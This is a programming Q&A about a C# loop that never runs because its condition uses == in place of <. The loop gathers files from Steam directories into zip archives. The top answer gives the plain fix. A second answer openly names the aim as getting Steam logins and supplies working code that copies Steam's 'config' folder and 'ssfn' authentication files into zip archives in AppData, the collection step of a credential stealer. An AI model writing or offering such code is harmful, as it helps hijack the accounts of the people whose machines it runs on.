# for loop not working using Count()

Tags: c#, for-loop

I have created a program that copies directories and some files in a zip archive.

So when I launch the program, there is no archive.
I have tried to place a breakpoint, and it shows the for cycle is skipping. Why?

```
for (int i = 0; i == steamPath.Count(s => s != null); i++)
{
    string appData = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
    ZipFile zip = new ZipFile();
    zip.AddFile(Path.Combine(path[i], "folder"));
    foreach (string f in Directory.GetFiles(path[i]))
    {
        string fileName = Path.GetFileName(f);
        if(fileName.StartsWith("name"))
        {
            zip.AddFile(Path.Combine(path[i], fileName));
        }
    }
    zip.Save(Path.Combine(appData, "File[" + i + "].zip"));
}
```

Comment: `i == ...` seems an unlikely condition...

Comment: I would recommend using a `foreach` for the outer loop, so you can actually take advantage of the fact you are trying to skip null paths. As it stands, any null paths have a good change of causing you problems a your loop will still try to access them depending on the order they appear

Comment: Don't trash your question if you don't like it any more. Just accept the answer and go on.

Answer (score 6):

Because the `i == steamPath.Count(s => s != null)` will never result in a `true` if the count is more than `0`... Hence, the loop will break.

Try this:

```
i < steamPath.Count(s => s != null)
```

The `for` loop runs *as long as* the condition is `true`, not *until* it is `true`.

Another option would be the use of `foreach`:

```
foreach (var path in steamPath.Where(s => s != null)))
{ }
```

Answer (score 0):

If you're trying to get steam logins there are a few easier ways to go about it is all I'm going to say.
/id/avvulous

i'd suggest filtering the 'null's out of your steamPath array before you run the loop, then you can use a 'foreach' loop instead and make your job a lot easier, they're two seperate jobs, and you're not combining them correctly.

```
            List<string> steamPathsNoNull = new List<string>();

            foreach (string s in steamPaths)
            {
                if (s != null)
                {
                    steamPathsNoNull.Add(s);
                }
            }

            int i = 0;

            foreach (string s in steamPathsNoNull)
            {
                string appData = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
                ZipFile zip = new ZipFile();
                zip.AddFile(Path.Combine(s, "config"));
                foreach (string f in Directory.GetFiles(s))
                {
                    string fileName = Path.GetFileName(f);
                    if (fileName.StartsWith("ssfn"))
                    {
                        zip.AddFile(Path.Combine(s, fileName));
                    }
                }

                zip.Save(Path.Combine(appData, "Steam[" + i + "].zip"));

                i++;
            }
```